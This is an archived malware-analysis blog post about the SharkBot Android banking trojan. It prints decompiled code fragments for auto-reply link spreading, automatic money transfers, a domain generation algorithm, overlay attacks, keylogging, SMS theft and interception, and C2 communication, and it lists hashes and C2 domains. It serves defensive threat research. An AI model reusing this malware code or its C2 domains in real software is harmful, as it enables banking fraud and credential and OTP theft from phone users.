{
	"id": "4248eec9-8102-4861-951d-ffad5f75eeb2",
	"created_at": "2026-04-06T00:13:34.455219Z",
	"updated_at": "2026-04-10T13:11:48.319165Z",
	"deleted_at": null,
	"sha1_hash": "6730c49b31290a4a2dd4dfde8ee8bc01fcfd7c71",
	"title": "Technical analysis of SharkBot android malware",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1071943,
	"plain_text": "Technical analysis of SharkBot android malware\r\nBy Muhammad Hasan Ali\r\nPublished: 2022-09-06 · Archived: 2026-04-05 21:17:29 UTC\r\n12 minute read\r\nبسم الله الرحمن الرحيم\r\nFreePalestine\r\nIntroductionPermalink\r\nIn this blog, we will talk about SharkBot android malware. SharkBot is found at the end of October 2021 by the\r\nCleafy Threat Intelligence Team. The malware comes with classic features such as stealing SMS, stealing\r\ncontacts, abusing accessibility service, overlay attack ,and intercept received SMS. And comes with new\r\ntechniques such as ATS which enables the malware to transfer money by auto-filling fields in legitimate banking\r\napps and initate money transfers. And Auto Direct reply technique this enables the malware to spread more. When\r\na message comes to the user and the user reply to the message through the notification not through entering the\r\nmessageing app this called Direct reply. The malware can intercept the received messages notification and auto\r\ndirect reply with a malicious link to download a malicous app. But in newer versions of SharkBot, Auto direct\r\nreply is not implemented.\r\nIn this article, we will analyze two sample because we will explain Auto direct reply which is not implemented in\r\nnewer versions of the malware. And we will analyze new version of SharkBot sample which has ATS technique\r\nand other techniques.\r\nTechnical reviewPermalink\r\nSharkBot version: This version of SharkBot is 2.6 .\r\nAuto direct reply: The malware will try to intercept message notificaion and reply to it with a malicious message\r\ncontain malicous link to download malicous APK.\r\nAutomatic Transfer Systems: allows the attacker to auto-fill fields of banking apps and initate money transfers.\r\nDomain Generation Algorithm: is used by attackers to create random domain names for C2 servers to prevent\r\nblocking their communication with C2 servers.\r\nClassic features: features that any android mlaware will have such as steal SMS, steal contacts, overlay attack,\r\nkeylogging, and steal Cookies.\r\nAnti-emulator: it checks if it’s installed on an emulator or not. If the emulator is detected, then the app won’t\r\nlaunch and it won’t communicate with the C2 server.\r\nhttps://muha2xmad.github.io/malware-analysis/sharkbot/\r\nPage 1 of 17\n\nPresistence: After the malware is install, the malware will ask for Accessbility service . Then the malware will\r\nhide its icon and if you try to uninstall, it goes to Homescreen.\r\nThis version of SharkBot is 2.6 .\r\npublic static final String I = \"release\";\r\n public static final String M = \"com.ohalqpdj.discopet\";\r\n public static final boolean b = false;\r\n public static final int c = 6;\r\n public static final String j = \"2.6\";\r\nAuto Direct ReplyPermalink\r\nNote: auto reply is implemented in old samples. Download from malwarebazaar\r\nThis feature of Direct Reply is to enable the user to reply to the incomming message through the notification of\r\nthe message not entering the app itself. The malware abuses this feature to auto send a malicous link to other users\r\nby repling to the message with a malicious link to download a malicous APK which in our case will download\r\nSharkBot dropper.\r\nhttps://muha2xmad.github.io/malware-analysis/sharkbot/\r\nPage 2 of 17\n\nhttps://muha2xmad.github.io/malware-analysis/sharkbot/\r\nPage 3 of 17\n\nFigure(1) Show what is direct reply - photo from stackoverflow\r\nThe malware will first intercept the notifications of comming SMSs then auto reply to them with a message. This\r\nmessage is received from C2 server contains malicuos link to download malcious APK.\r\npublic void onNotificationPosted(StatusBarNotification statusBarNotification) {\r\n if (statusBarNotification != null) {\r\n a aVar = new a(this);\r\n this.f2719e = aVar;\r\n if (System.currentTimeMillis() - Long.parseLong(aVar.r(getString(R.string.app_name), String.valueOf(\r\n String r = this.f2719e.r(\"autoReply\", \"{}\");\r\n String packageName = statusBarNotification.getPackageName();\r\n d.j.a.a.c.b.a a = a(statusBarNotification.getNotification(), packageName);\r\n Bundle bundle = statusBarNotification.getNotification().extras;\r\n if (!(bundle == null || a == null || packageName == null || r.equals(\"{}\"))) {\r\n String b2 = b(packageName + bundle.getString(\"android.title\"));\r\n JSONObject jSONObject = new JSONObject(r);\r\n if (jSONObject.has(\"all\") || jSONObject.has(packageName)) {\r\n long parseLong = Long.parseLong(this.f2719e.r(b2, \"0\"));\r\n if (!this.f2718d.equals(b2) \u0026\u0026 System.currentTimeMillis() - parseLong \u003e 43200000) {\r\n this.f2718d = b2;\r\n a.j(getApplicationContext(), jSONObject.has(\"all\") ? jSONObject.getString(\"all\") : j\r\n this.f2719e.z(b2, String.valueOf(System.currentTimeMillis()));\r\n cancelNotification(statusBarNotification.getKey());\r\n }\r\n }\r\n }\r\n this.f2719e.close();\r\n }\r\n }\r\n }\r\nhttps://muha2xmad.github.io/malware-analysis/sharkbot/\r\nPage 4 of 17\n\nAfter the malware intercept the notification, the malware will receive a command AutoReply to reply to the\r\nnotification with a message contains a malicicous link. This link could be a shorten link such as Bit.ly link.\r\nelse if (c2 == 1) {\r\n if (jSONObject.has(\"autoReply\")) {\r\n s.this.s.put(\"status\", \"notify\");\r\n d.j.a.a.c.a aVar2 = new d.j.a.a.c.a(s.this.x);\r\n aVar2.z(\"autoReply\", jSONObject.getString(\"autoReply\"));\r\n aVar2.close();\r\n } else {\r\n s.this.s.put(\"status\", \"skip\");\r\n s.this.s.put(\"skip\", System.currentTimeMillis());\r\n }\r\n s sVar3 = s.this;\r\n sVar3.g0(sVar3.s);\r\n s.this.r = 2;\r\n }\r\nAutomatic Transfer Systems ATSPermalink\r\nNote: other sections is from new samples download from hatching triage\r\nAutomatic Transfer Systems ATS is an advanced technique which allows the attacker to auto-fill fields of\r\nbanking apps and initate money transfers. This happens when the malware abuses the Accessbility service\r\nwhich allows the attacker to get the content of the window and enables the attacker to click/touch and insert text\r\ninto text field.\r\nhttps://muha2xmad.github.io/malware-analysis/sharkbot/\r\nPage 5 of 17\n\nFigure(2) Show how Sharkbot preforms ATS - photo from cleafy\r\nWhen the victim opens a banking app, the malware will get notified through revceiving an array of events such as\r\nclicks/touches , button presses , gestures to be simulated in an specific order. Then the malware will\r\nsimulate the interation of the victim with the banking information to do the money transfers as if the malware is\r\nthe user himself.\r\n public void m(String s) {\r\n try {\r\n this.d();\r\n aa.m().a = false;\r\n if(s == null) {\r\n this.b = new JSONArray(new StringBuilder().insert(0, \"[{\\\"action\\\":\\\"CLICK\\\",\\\"nodes\\\":[{\\\"searc\r\n return;\r\n }\r\n this.b = new JSONArray(s);\r\n }\r\n catch(Exception unused_ex) {\r\n }\r\n }\r\nDomain Generation Algorithm DGAPermalink\r\nhttps://muha2xmad.github.io/malware-analysis/sharkbot/\r\nPage 6 of 17\n\nIn this sample, it has a hard-coded C2 server link http://f3eac8de096e59ca.live/ , but what happens if the C2\r\nserver is down? Here comes the role of DGA. DGA technique is used by attackers to create random domain names\r\nfor C2 servers to prevent blocking their communication with C2 servers. Hard-coded C2 servers are easy to block\r\nor taken down but DGA is hard to block or taken down. In this version of SharkBot, the malware uses MD5 to\r\ngenerate domain names, get(3) to get the current week of the current year, get(1) to get the current year.\r\n private String m() {\r\n try {\r\n StringBuilder stringBuilder0 = new StringBuilder();\r\n Calendar calendar0 = Calendar.getInstance();\r\n String[] arr_s = \".xyz,.live,.com,.store,.info,.top,.net\".split(\",\");\r\n int v = 0;\r\n while(v \u003c arr_s.length) {\r\n String s = arr_s[v];\r\n String s1 = aa.m().m(new StringBuilder().insert(0, s).append(calendar0.get(3)).toString()) + cal\r\n ++v;\r\n stringBuilder0.append(\",http://\").append(s1.substring(0, 16)).append(s).append(\"/\");\r\n }\r\n return stringBuilder0.toString().toLowerCase();\r\n }\r\n catch(Exception unused_ex) {\r\n return \"\";\r\n }\r\n }\r\nClassic featuresPermalink\r\nClassic features are features that any android mlaware will have such as steal SMS, steal contacts, overlay attack,\r\nkeylogging, and steal Cookies.\r\nOverlay attackPermalink\r\nThe malware will perform overlay attack when the victim opens a specific app usually banking apps or\r\ncryptocurrency apps to steal the victim’s credentials.\r\nprotected void onCreate(Bundle bundle0) {\r\n String s;\r\n super.onCreate(bundle0);\r\n this.getWindow().setFlags(0x400, 0x400);\r\n this.requestWindowFeature(1);\r\n try {\r\n s = this.getIntent().getStringExtra(\"data\");\r\n }\r\n catch(Exception unused_ex) {\r\nhttps://muha2xmad.github.io/malware-analysis/sharkbot/\r\nPage 7 of 17\n\ns = null;\r\n }\r\n if(s == null) {\r\n goto label_107;\r\n }\r\n try {\r\n if(!s.isEmpty()) {\r\n this.setContentView(0x7F0B001D);\r\n WebView webView0 = new WebView(this);\r\n this.M = webView0;\r\n webView0.setWebViewClient(new WebViewClient());\r\n this.M.getSettings().setJavaScriptEnabled(true);\r\n this.M.getSettings().setLoadWithOverviewMode(true);\r\n this.M.getSettings().setUseWideViewPort(false);\r\n this.M.getSettings().setSupportZoom(false);\r\n this.M.addJavascriptInterface(new com.ohalqpdj.discopet.Activity.aa(this, this), \"Android\");\r\n this.M.loadDataWithBaseURL(\"fake-url\", \"\u003chtml\u003e\u003c/html\u003e\", \"text/html\", \"UTF-8\", null);\r\n this.I = (RelativeLayout)this.findViewById(0x7F0801D5);\r\n if(s.equals(\"url\")) {\r\n this.I.addView(this.M);\r\n this.M.loadUrl(aa.m().G);\r\n return;\r\n }\r\n if(s.equals(\"iWantA11\")) {\r\n this.I.addView(this.M);\r\n this.M.loadUrl(\"file:///android_asset/help.html\");\r\n return;\r\n }\r\n if(aa.m().m()) {\r\n this.a();\r\n return;\r\n }\r\n this.M();\r\n return;\r\n }\r\n label_107:\r\n c.m().m(0, \"WebActivity HTML_OVERLAY_URL: null\");\r\n this.M();\r\n }\r\n catch(Exception unused_ex) {\r\nhttps://muha2xmad.github.io/malware-analysis/sharkbot/\r\nPage 8 of 17\n\n}\r\n }\r\nSteal SMSPermalink\r\nThe malware collect the SMS stored in the victim’s device and send it to C2 server.\r\n protected void onCreate(Bundle bundle0) {\r\n super.onCreate(bundle0);\r\n try {\r\n aa.m();\r\n new String(\"ComposeSms onCreate\");\r\n String s = this.getIntent().getStringExtra(\"data\");\r\n this.b = this.getIntent().getStringExtra(\"ats\");\r\n int v = -1;\r\n int v1 = s.hashCode();\r\n if(v1 == 0xA7794C29) {\r\n if(s.equals(\"ADMIN_SMS\")) {\r\n v = 0;\r\n }\r\n }\r\n else if(v1 == 0x50BDF8FA) {\r\n if(s.equals(\"configSaveSMS\")) {\r\n v = 1;\r\n }\r\n }\r\n else if(v1 == 2031367170 \u0026\u0026 (s.equals(\"SEND_SMS\"))) {\r\n v = 2;\r\n }\r\n if(v != 0) {\r\n switch(v) {\r\n case 1: {\r\n this.m(this, new String[]{\"android.permission.RECEIVE_SMS\"}, 0x7B);\r\n break;\r\n }\r\n case 2: {\r\n this.m(this, new String[]{\"android.permission.SEND_SMS\"}, 0x7B);\r\n break;\r\n }\r\n default: {\r\n c.m().m(1, new StringBuilder().insert(0, \"ComposeSms bad data: \").append(s).toString());\r\n }\r\n }\r\n }\r\n else if(Build.VERSION.SDK_INT \u003e= 29) {\r\nhttps://muha2xmad.github.io/malware-analysis/sharkbot/\r\nPage 9 of 17\n\nRoleManager roleManager0 = (RoleManager)this.getSystemService(RoleManager.class);\r\n if((roleManager0.isRoleAvailable(\"android.app.role.SMS\")) \u0026\u0026 !roleManager0.isRoleHeld(\"android.a\r\n this.startActivityForResult(roleManager0.createRequestRoleIntent(\"android.app.role.SMS\"), 1)\r\n }\r\n }\r\n else {\r\n ServiceHandler.m().m(null);\r\n Intent intent0 = new Intent(\"android.provider.Telephony.ACTION_CHANGE_DEFAULT\");\r\n intent0.putExtra(\"package\", this.getPackageName());\r\n intent0.addFlags(0x10000000);\r\n this.startActivity(intent0);\r\n }\r\n }\r\n catch(Exception unused_ex) {\r\n return;\r\n }\r\n this.finish();\r\n }\r\nKeyloggingPermalink\r\nThe malware has the capabbility to store key strokes of the victim using startkeylogs. This helps to steal the\r\nvictim’s banking credentials or login credentials.\r\npublic void onAccessibilityEvent(AccessibilityEvent accessibilityEvent0) {\r\n String s1;\r\n String s;\r\n AccessibilityNodeInfo accessibilityNodeInfo0;\r\n if(accessibilityEvent0 != null) {\r\n try {\r\n if(accessibilityEvent0.getPackageName() != null) {\r\n accessibilityNodeInfo0 = accessibilityEvent0.getSource();\r\n if(accessibilityNodeInfo0 == null) {\r\n accessibilityNodeInfo0 = this.getRootInActiveWindow();\r\n if(accessibilityNodeInfo0 == null) {\r\n return;\r\n }\r\n }\r\n accessibilityNodeInfo0.refresh();\r\n s = accessibilityEvent0.getPackageName().toString();\r\n s1 = this.m(accessibilityEvent0.getEventType());\r\n if(this.b == null \u0026\u0026 !s.equals(this.getPackageName()) \u0026\u0026 (this.G \u003e 0 || (aa.m().m(\"sniffer\",\r\n if(this.G \u003e 0) {\r\nhttps://muha2xmad.github.io/malware-analysis/sharkbot/\r\nPage 10 of 17\n\nint v = accessibilityEvent0.getEventType();\r\n goto label_46;\r\n }\r\n goto label_65;\r\n }\r\n goto label_90;\r\n }\r\n }\r\n catch(Exception unused_ex) {\r\n }\r\n return;\r\n label_46:\r\n if(v == 16) {\r\n try {\r\n JSONObject jSONObject0 = new JSONObject();\r\n jSONObject0.put(\"logsKeylogger\", accessibilityEvent0.getText().toString());\r\n jSONObject0.put(\"package\", s);\r\n b.m(App.m()).a(jSONObject0.toString()); // save logs\r\n }\r\n catch(Exception unused_ex) {\r\n }\r\n }\r\nIntercept SMSPermalink\r\nThen the malware will intercept the coming SMS. This makes the received SMS hidden from the victim. This\r\nuseful for the attacker to get OTP.\r\n public void onReceive(Context context0, Intent intent0) {\r\n try {\r\n if(((aa.m().l.equals(\"yes\")) || (this.m(App.m()))) \u0026\u0026 (intent0.getAction().equals(\"android.provider\r\n Bundle bundle0 = intent0.getExtras();\r\n if(bundle0 != null) {\r\n Object[] arr_object = (Object[])bundle0.get(\"pdus\");\r\n if(arr_object != null) {\r\n int v = 0;\r\n while(v \u003c arr_object.length) {\r\n SmsMessage smsMessage0 = this.m(arr_object[v], bundle0);\r\n ++v;\r\n this.b = new StringBuilder().insert(0, smsMessage0.getDisplayOriginatingAddress()).a\r\n }\r\n aa aa0 = aa.m();\r\nhttps://muha2xmad.github.io/malware-analysis/sharkbot/\r\nPage 11 of 17\n\naa0.j = this.b;\r\n JSONObject jSONObject0 = new JSONObject();\r\n jSONObject0.put(\"smsLogs\", this.b);\r\n c.m().m(jSONObject0); // upload to C2 server\r\n }\r\n this.abortBroadcast();\r\n }\r\n }\r\n }\r\n catch(Exception unused_ex) {\r\n }\r\n }\r\n}\r\nCommandsPermalink\r\nThis commands will be received from C2 server to the victim.\r\nstopAll: is used to reset/stop the ATS feature, stopping the in progress automation.\r\nsmsSend: used to send a text message to the specified phone number by the TAs\r\nopenPackage: used to open the specified app from the infected device.\r\nremoveApp: used to uninstall the specified app from the infected device\r\ngetDoze: used to check if the permissions to ignore battery optimization are enabled, and show the Android\r\nsettings to disable them if they aren’st\r\nats: used to enable ATS attacks. It includes a JSON array with the different events/actions it should simulate to\r\nperform ATS (button clicks, etc.)\r\ntry {\r\n if(jSONObject1.has(\"command\")) {\r\n aa.m();\r\n new StringBuilder().insert(0, \"onApiRequestDone: \").append(jSONObject1).toString();\r\n String s = jSONObject1.getString(\"command\");\r\n int v = s.hashCode();\r\n switch(v) {\r\n case 0x8BD150FC: {\r\n boolean z = s.equals(\"updateLib\");\r\n v1 = z ? 2 : -1;\r\n break;\r\n }\r\n case 0x8FAEE23F: {\r\nhttps://muha2xmad.github.io/malware-analysis/sharkbot/\r\nPage 12 of 17\n\nv1 = s.equals(\"stopAll\") ? 8 : -1;\r\n break;\r\n }\r\n case -1003888996: {\r\n v1 = s.equals(\"openPackage\") ? 4 : -1;\r\n break;\r\n }\r\n case -875734902: {\r\n v1 = s.equals(\"unlockPhone\") ? 0 : -1;\r\n break;\r\n }\r\n case 0xEA9E40DA: {\r\n v1 = s.equals(\"deleteLib\") ? 1 : -1;\r\n break;\r\n }\r\n case -122979700: {\r\n v1 = s.equals(\"enableKeyLogger\") ? 9 : -1;\r\n break;\r\n }\r\n case 0xFA4F7FCD: {\r\n v1 = s.equals(\"AntiDelete\") ? 5 : -1;\r\n break;\r\n }\r\n case -75592340: {\r\n v1 = s.equals(\"getDoze\") ? 7 : -1;\r\n break;\r\n }\r\n case 0x17AA0: {\r\n v1 = s.equals(\"ats\") ? 12 : -1;\r\n break;\r\n }\r\n case 1097035112: {\r\n v1 = s.equals(\"iWantA11\") ? 6 : -1;\r\n break;\r\n }\r\n case 1255329260: {\r\n v1 = s.equals(\"makeSwipe\") ? 3 : -1;\r\n break;\r\n }\r\n case 0x4C6F0AFD: {\r\n v1 = s.equals(\"removeApp\") ? 11 : -1;\r\n break;\r\n }\r\n case 1979901105: {\r\n v1 = s.equals(\"sendSMS\") ? 10 : -1;\r\n break;\r\n }\r\nhttps://muha2xmad.github.io/malware-analysis/sharkbot/\r\nPage 13 of 17\n\ndefault: {\r\n v1 = -1;\r\n }\r\n }\r\nCommunication with C2Permalink\r\nThe malware will communicate with C2 server and POST request with information about the victim’s device.\r\ntry {\r\n App app0 = App.m();\r\n aa aa0 = aa.m();\r\n jSONObject0.put(\"botID\", aa0.C);\r\n jSONObject0.put(\"statusScreen\", aa0.h(app0));\r\n jSONObject0.put(\"pDoze\", ((boolean)(aa.m().m(App.m()) ? 0 : 1)));\r\n jSONObject0.put(\"pDefaultSms\", aa0.a(app0));\r\n jSONObject0.put(\"pDrawOverlays\", Settings.canDrawOverlays(app0));\r\n jSONObject0.put(\"pOpenOverlays\", aa.m().m());\r\n jSONObject0.put(\"pAccessibility\", aa0.m(app0, ServiceHandler.class));\r\n jSONObject0.put(\"pNotification\", aa0.M(app0));\r\n jSONObject0.put(\"pSendSMS\", aa0.m(app0, \"android.permission.SEND_SMS\"));\r\n jSONObject0.put(\"configOverlayReopen\", aa.m().a);\r\n jSONObject0.put(\"AntiDelete\", ServiceHandler.m().m);\r\n jSONObject0.put(\"time_knock\", aa0.I);\r\n jSONObject0.put(\"versionLib\", aa0.J);\r\n jSONObject0.put(\"hash\", aa0.D.getString(\"hash\"));\r\n jSONObject0.put(\"admin_url\", this.j);\r\n jSONObject0.put(\"configNotification\", aa0.f);\r\n jSONObject0.put(\"configSaveSMS\", aa0.l);\r\n jSONObject0.put(\"logsGrabber\", b.m(App.m()).m());\r\n if(!jSONObject0.has(\"logsSniffer\")) {\r\n jSONObject0.put(\"logsSniffer\", b.m(App.m()).m());\r\n }\r\nAnti-emulatorPermalink\r\nThe malware try to make it harder on malware analysts to analyze a malware. When the malware is installed on\r\nthe device, it checks if it’s installed on an emulator or not. If the emulator is detected, then the app won’t launch\r\nand it won’t communicate with the C2 server.\r\nhttps://muha2xmad.github.io/malware-analysis/sharkbot/\r\nPage 14 of 17\n\nhttps://muha2xmad.github.io/malware-analysis/sharkbot/\r\nPage 15 of 17\n\nFigure(2) Show how Sharkbot exits when there's an emulator\r\nIoCPermalink\r\npackage name: com.ohalqpdj.discopet\r\nHashes:\r\nOld sample: d05fb8c6899c96d1519e46eaea848ead6a17c7ddd0e20228e83c1aa9f264011d\r\nnew sample v2.6: bf3fcdba7148627abfed402d038c99d3b2e60cd87cd04fe22b6ea3aac5ac9151\r\nC2:\r\nhttp://f3eac8de096e59ca.live/\r\nC2 generated by DGA:\r\n8d6102613d7d4ccc.xyz\r\n3634b259b56f2866.live\r\n04ff9f101c72a417.com\r\nb5c4f49eae222c10.store\r\ne30a26a32a8020f1.info\r\n6d829850c8eb7892.top\r\nefd909761db065cf.net\r\nhttps://muha2xmad.github.io/malware-analysis/sharkbot/\r\nPage 16 of 17\n\nArticle quotePermalink\r\nِلك\r\nَب ْذُرك على َقدِر \r\nَقد\r\nREFPermalink\r\n1- Hatching report\r\n2- SharkBot: a new generation Android banking Trojan being distributed on Google Play Store\r\nSource: https://muha2xmad.github.io/malware-analysis/sharkbot/\r\nhttps://muha2xmad.github.io/malware-analysis/sharkbot/\r\nPage 17 of 17",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://muha2xmad.github.io/malware-analysis/sharkbot/"
	],
	"report_names": [
		"sharkbot"
	],
	"threat_actors": [],
	"ts_created_at": 1775434414,
	"ts_updated_at": 1775826708,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/6730c49b31290a4a2dd4dfde8ee8bc01fcfd7c71.pdf",
		"text": "https://archive.orkl.eu/6730c49b31290a4a2dd4dfde8ee8bc01fcfd7c71.txt",
		"img": "https://archive.orkl.eu/6730c49b31290a4a2dd4dfde8ee8bc01fcfd7c71.jpg"
	}
}